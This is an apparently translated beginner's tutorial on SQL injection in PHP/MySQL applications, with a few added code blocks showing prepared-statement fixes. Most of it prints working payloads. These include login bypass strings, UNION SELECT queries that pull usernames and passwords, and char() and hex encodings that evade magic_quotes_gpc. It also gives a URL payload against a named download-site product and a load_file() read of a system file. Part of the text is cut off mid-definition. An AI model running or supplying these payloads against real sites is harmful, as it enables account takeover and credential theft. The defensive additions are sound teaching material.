PHP injection in detail. This article is written mainly for newbies; if you are already an old hand, some of it may feel boring, but read it carefully and you will find plenty of interesting things.
To read this article you only need to know the following:
1. How to set up a PHP + MySQL environment. Relevant articles are included on the CD; if you are not clear about building a PHP + MySQL environment, please read those first. The previous issue also covered this topic.
2. How PHP and Apache are configured, mainly through php.ini and httpd.conf.
In this article we mainly use the php.ini configuration. For security, safe mode is usually enabled in php.ini, that is, safe_mode = On; and because display_errors shows a lot of useful information when a PHP error occurs, it should be disabled: once display_errors = Off, PHP function errors are no longer shown to the user.
In php.ini, magic_quotes_gpc is an important option. Newer versions default to magic_quotes_gpc = On; only old versions default to magic_quotes_gpc = Off, but some of those antiques are still in use!
What happens when magic_quotes_gpc = On in php.ini? Don't worry, the sky will not fall! It only converts every ' (single quote), " (double quote), \ (backslash) and NUL character in the submitted variables into an escaped form with a backslash, for example ' becomes \' and \ becomes \\.
This makes us very uncomfortable; many times we have to say BYEBYE to character-type injection.
But don't be discouraged, we still have good ways to deal with it. Read on!
3. Some PHP foundation and a few SQL statements. These are very simple, and we use very little of them, so let's charge ahead!
Let's first look at what we can do when magic_quotes_gpc = Off, and then find a way around the magic_quotes_gpc = On problem.
1. Injection attacks when magic_quotes_gpc = Off
Although magic_quotes_gpc = Off is not safe and newer versions default to magic_quotes_gpc = On, we still find magic_quotes_gpc = Off on many servers, such as www.qichi.*.
Some programs, such as the vbb forum, even strip the escape characters themselves when magic_quotes_gpc = On, so we can take advantage of them.
Injection methods for magic_quotes_gpc = Off therefore still have a large market.
Next we explain MySQL + PHP injection in detail in terms of syntax, injection points and injection types.
A: Starting with MySQL syntax
1. First, some basic MySQL syntax, a make-up lesson for those who didn't study well ~_~
1) select
SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
    select_expression, ...
    [INTO {OUTFILE | DUMPFILE} 'file_name' export_options]
    [FROM table_references
        [WHERE where_definition]
        [GROUP BY col_name, ...]
        [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC], ...]
    ];
These are the commonly used parts. select_expression is the column(s) to retrieve; WHERE limits the conditions, and INTO OUTFILE writes the select result to a file. Of course, select can also output a value directly, for example:
mysql> select 'A';
+---+
| A |
+---+
| A |
+---+
1 row in set (0.00 sec)
For details, see mysql Chinese manual section 7.12.
The following describes some ways to exploit it.
Look at the code first. This code is used for searching:
.........
$query = "SELECT * FROM users WHERE username LIKE '%$search%' ORDER BY username";
.......
?>
By the way, '%' in MySQL is a wildcard; the others are '*' and '_'. '*' stands for all field names, while '%' matches field values (any run of characters) and must be used with LIKE. The other wildcard, the underscore '_', is different from the previous one: it matches any single character. In the code above, '*' returns all fields, and '%$search%' matches everything containing the string $search.
So how do we inject here?
Haha, much like ASP.
Submit in the form:
aabb%' or 1=1 order by id #
Note: # is the comment marker in MySQL, meaning the rest of the SQL statement is not executed; we will come back to it later.
Someone may ask why or 1=1 is used.
Once the submitted content is placed into the SQL statement it becomes:
SELECT * FROM users WHERE username LIKE '%aabb%' or 1=1 order by id #%' ORDER BY username
If there is no user name containing aabb, or 1=1 makes the condition true, so all rows are returned.
We can also do this.
Submit in the form:
%' order by id #
or
' order by id #
which go into the SQL statement as
SELECT * FROM users WHERE username LIKE '%%' order by id #%' ORDER BY username
and
SELECT * FROM users WHERE username LIKE '%' order by id #%' ORDER BY username
Of course, all rows are returned,
listing all the users, and maybe even the passwords.
This was one example; more subtle select statements appear below. select is actually almost everywhere!
2) Now let's look at update.
The MySQL Chinese manual explains it like this:
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1, col_name2=expr2, ...
    [WHERE where_definition]
UPDATE updates columns in the rows of an existing table with new values. The SET clause specifies which columns to modify and the values they should be given. If a WHERE clause is given, it specifies which rows to update; otherwise all rows are updated.
For more information see MySQL Chinese manual section 7.17; here we go through it in detail.
From the above we can see that update is mainly used for updating data, such as editing articles or modifying user data. We seem to be more interested in the latter, because ......
Check the code first.
The table structure is given first so that you can follow along.
create table users (
    id int(10) not null auto
Let's build an injection statement.
Enter
a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #
which goes into the SQL statement as
select * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor #%'
[Figure 17: result]
How about that? Out it comes, haha. Everything is under control.
C: Now let's look at the various injection methods by injection location.
1) First, the background login.
Code first:
// login.php
.......
$query = "select * from alphaauthor where UserName='"
       . $HTTP_POST_VARS["UserName"] . "' and Password='"
       . $HTTP_POST_VARS["Password"] . "'";
$result = mysql_query($query);
$data = mysql_fetch_array($result);
if ($data)
{
    echo "background login successful";
}
else
{
    echo "re-login";
    exit;
}
.........
?>
The username and password go straight into the SQL without any processing.
Let's see how we can bypass it.
The most classic one:
Enter the following as both the user name and the password:
' or ''='
which goes into the SQL statement as
select * from alphaauthor where UserName='' or ''='' and Password='' or ''=''
The $data obtained this way is definitely non-empty, that is, we have logged in successfully.
There are other bypass methods; the principle is the same, you just need to find a way to make $data come back true.
We can use the following variants.
1.
Enter ' or 'a'='a as both the user name and the password.
SQL:
select * from alphaauthor where UserName='' or 'a'='a' and Password='' or 'a'='a'
2.
Enter ' or 1=1 and ''=
SQL:
select * from alphaauthor where UserName='' or 1=1 and ''='' and Password='' or 1=1 and ''=''
Enter ' or 2>1 and ''=
SQL:
select * from alphaauthor where UserName='' or 2>1 and ''='' and Password='' or 2>1 and ''=''
3.
User name ' or 1=1 # and any password.
SQL:
select * from alphaauthor where UserName='' or 1=1 #' and Password='anything'
The part after # is commented out, so of course the result is true.
4.
If the admin has id=1, you can use
User name ' or id=1 # and any password.
SQL:
select * from alphaauthor where UserName='' or id=1 #' and Password='anything'
[Figure 18]
[Figure 19]
How about that? Logged straight in!
As the saying goes, nothing is impossible.
There are more constructions waiting for you to think up after class.
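The login code above and the LIKE search from section A both paste the request value into the SQL text. As an added example (not code from the original article, and not the code of any site it mentions), here is the same login and search written with mysqli prepared statements; the table and column names alphaauthor, UserName, Password, users and username are the article's, and the connection values in the usage lines are placeholders:

```php
<?php
// Added example, not code from the original article: the article's login and
// search queries rewritten with mysqli prepared statements.
// Table/column names are the article's; connection values are placeholders.

// How the article builds the login query: the input is pasted into the SQL
// text, so a user name of  ' or ''='  rewrites the WHERE clause.
function vulnerable_login_sql(string $user, string $pass): string
{
    return "select * from alphaauthor where UserName='" . $user
         . "' and Password='" . $pass . "'";
}

// Hardened form: the SQL text is fixed and the values travel separately as
// bound parameters, so quotes, '#' and "or 1=1" inside them are only data.
// Returns the matching row or null. The password is compared as stored,
// exactly as the article's code does; a real application would store a
// hash and call password_verify() on the fetched row instead.
function login(mysqli $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare(
        'select * from alphaauthor where UserName = ? and Password = ?'
    );
    $stmt->bind_param('ss', $user, $pass);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The LIKE search. Binding stops the quote/comment trick, but the LIKE
// wildcards the article lists ('%' and '_') are interpreted by LIKE itself,
// so a search for "50%" would still match anything starting with 50.
// Escape them with '!' (declared as the escape character in the query)
// before adding the surrounding '%'.
function like_pattern(string $search): string
{
    // escape '!' first so the escapes added afterwards are not doubled
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $search);
    return '%' . $escaped . '%';
}

function search_users(mysqli $db, string $search): array
{
    $pattern = like_pattern($search);
    $stmt = $db->prepare(
        "select * from users where username like ? escape '!' order by username"
    );
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage (connection values are placeholders):
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'site');
// echo vulnerable_login_sql("' or ''='", "' or ''='"), "\n";
//   -> select * from alphaauthor where UserName='' or ''='' and Password='' or ''=''
// var_dump(login($db, "' or ''='", "' or ''='"));             // NULL: no such user
// var_dump(search_users($db, "aabb%' or 1=1 order by id #")); // only literal matches
```

The point of like_pattern() is the caveat a prepared statement does not cover on its own: the article's '%' and '_' are LIKE metacharacters, not SQL syntax, so they reach LIKE intact even when bound, and the application has to escape them if a literal search is intended.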
2) The second common injection point is the front-end information display area.
I have already covered this many times, and it involves the numeric and character types and so on, so I will not repeat it here.
Let's just give an example.
The Bihai Chaosheng download site v2.0.3 lite has an injection vulnerability; the code is not listed here, let's look at the result directly:
http://localhost/down/index.php?url=&dlid=1 and 1=2 union select 1,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18 from dl_users (spaces shown decoded)
[Figure 20]
Let's see what we got:
user name alpha,
and a long string for the password.
Why put the password in field 3 and the user name in field 5? As mentioned above, we guess that fields 3 and 5 are strings; the field types of username and password must match the fields we want them displayed in, so we place them this way.
Why 18 fields? I don't know if you still remember that when introducing union select we mentioned that the selects before and after a union must have the same number of fields. By increasing the number of selected values we guess that 18 fields are needed; only then is the union select content displayed normally!
3) Other data changes, such as user registration, which must exist on user-level applications.
We have already mentioned the update and insert statements above; because they are not very common they are not described here. Some advanced usage techniques for update and insert are discussed below.
II. Injection attacks when magic_quotes_gpc = On
When magic_quotes_gpc = On, every ' (single quote), " (double quote), \ (backslash) and NUL character in the submitted variables is automatically converted into an escaped form with a backslash.
This bursts the bubble of character-type injection; at this point we can only inject numeric types that are not passed through
intval(). We have already said a lot about the numeric type, right? Because a numeric value is not wrapped in single quotes, the escaping has nothing to act on, so in this case we can inject directly.
1) If it is a character type, it must be made to look like the following, that is, with no quotation marks around the characters.
Here we first need some string-processing functions.
There are many string functions; here we mainly cover the following. For details refer to the MySQL Chinese reference manual 7.4.10.
char() interprets its arguments as integers and returns a string made of the characters with those ASCII codes.
Of course, you can also use a hexadecimal value in place of the string; in that case put 0x before the hexadecimal digits. See the example below.
// login.php
......
$query = "select * from " . $art_system_db_table['user']
       . " where UserName=$username and Password=" . $pw;
......
?>
Suppose we know that the background user name is alpha.
Converted to ASCII codes that is char(97,108,112,104,97);
the hexadecimal value is 0x616C706861.
(Hexadecimal and ASCII conversion tools will be provided on the CD.)
All right, enter the following in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The SQL statement becomes:
select * from alphaAuthor where UserName=char(97,108,112,104,97) # and Password=
[Figure 21]
As we expected, it ran smoothly and we got what we wanted.
Of course, we can also construct
http://localhost/site/admin/login.php?username=0x616C706861%23
The SQL statement becomes:
select * from alphaAuthor where UserName=0x616C706861 # and Password=
Once again we succeeded. Quite a sense of accomplishment.
Maybe you will ask whether we can put the # inside char().
Actually char(97,108,112,104,97) is equivalent to 'alpha'.
Note that the quotation marks around alpha indicate the string alpha.
We know that if you execute
mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'
an error is returned, because MySQL takes alpha for a column name. So we have to put quotation marks around alpha,
as follows:
mysql> select * from dl_users where username='alpha';
This is correct.
If you put # in there, it becomes 'alpha#',
which goes into the SQL statement as
select * from dl_users where username='alpha#';
Of course nothing comes back, because there is no user named alpha#.
Okay, let's look at the example below.
// display.php
......
$query = "select * from " . $art_system_db_table['article']
       . " where type=$type";
......
?>
The code displays content according to its type. $type is not filtered and is placed into the query without quotation marks.
Assume the type column contains the class xiaohua; converted with char(), xiaohua is
char(120,105,97,111,104,117,97)
We build
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
In the SQL statement:
select * from $art_system_db_table[article] where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Take a look: our user name and password still come out!
[Figure omitted]
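The reason the char() and 0x... values in this section survive magic_quotes_gpc = On is that escaping only acts on quote, backslash and NUL characters, and those values contain none; the queries in display.php and the dlid example place the value in SQL without quotes, so escaping had nothing to do. As an added example (not code from the original article or from any program it names), the following shows that with addslashes(), which is what magic_quotes_gpc applied to every request value, and shows the two fixes that do work: converting values that must be numbers, and binding values that are strings. The column names type and dlid and the char()/0x values are the article's; the table names article and dl_files and the connection values are placeholders:

```php
<?php
// Added example, not code from the original article: why magic_quotes-style
// escaping cannot protect the unquoted queries of this section, and what does.
// Column names and char()/0x values are the article's; the table names
// article and dl_files and any connection values are placeholders.

// magic_quotes_gpc = On applied the equivalent of addslashes() to every
// GET/POST value. The article's payloads contain no quote, backslash or
// NUL, so they pass through untouched and are parsed as SQL.
function display_sql_with_magic_quotes(string $type): string
{
    $escaped = addslashes($type);       // what magic_quotes_gpc = On produced
    return "select * from article where type=" . $escaped;
}

// For a value that must be a number (the article's dlid, or an admin id),
// convert it first: "1 and 1=2 union select ..." becomes plain 1 and the
// rest of the text never reaches the query.
function download_sql(string $dlid): string
{
    $id = intval($dlid);
    return "select * from dl_files where dlid=" . $id;
}

// For a value that really is a string (the article's type), bind it: the
// driver sends it as data, so char(120,105,97,111,104,117,97) or
// 0x616C706861 is compared with the column as literal text, not evaluated.
function articles_by_type(mysqli $db, string $type): array
{
    $stmt = $db->prepare('select * from article where type = ?');
    $stmt->bind_param('s', $type);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage:
// echo display_sql_with_magic_quotes('0x616C706861 and 1=2'), "\n";
//   -> select * from article where type=0x616C706861 and 1=2   (unchanged)
// echo display_sql_with_magic_quotes("' or ''='"), "\n";
//   -> select * from article where type=\' or \'\'=\'   (a syntax error, not an injection)
// echo download_sql('1 and 1=2 union select 1,2,password from dl_users'), "\n";
//   -> select * from dl_files where dlid=1
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'site');   // placeholders
// var_dump(articles_by_type($db, 'char(120,105,97,111,104,117,97) and 1=2'));
//   -> array(0) {}  : no type has that literal name
```

The design choice is to decide the type of each request value before it goes anywhere near SQL: numbers are cast, strings are bound, and escaping is not relied on at all, since, as the section shows, its effect depends entirely on the value being inside quotes.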
2) Some may ask whether the powerful load_file() can still be used when magic_quotes_gpc = On.
That is the problem we solve next. The format of load_file() is load_file('file path').
We find that you only need to convert 'file path' to char(). Try it:
load_file('C:/boot.ini')
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
[Figure 2]
Put it into the actual injection:
http://localhost/down/index.php?url=&dlid=1 and 1=2 union select 1,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from dl_users (spaces shown decoded)
[Figure 3]
And there is the content of boot.ini.
Unfortunately, INTO OUTFILE cannot be worked around this way, since its file name must be a quoted string literal; otherwise things would be even better. There is still one situation where select * from table into outfile can be used, namely... (we'll keep you in suspense and tell you below).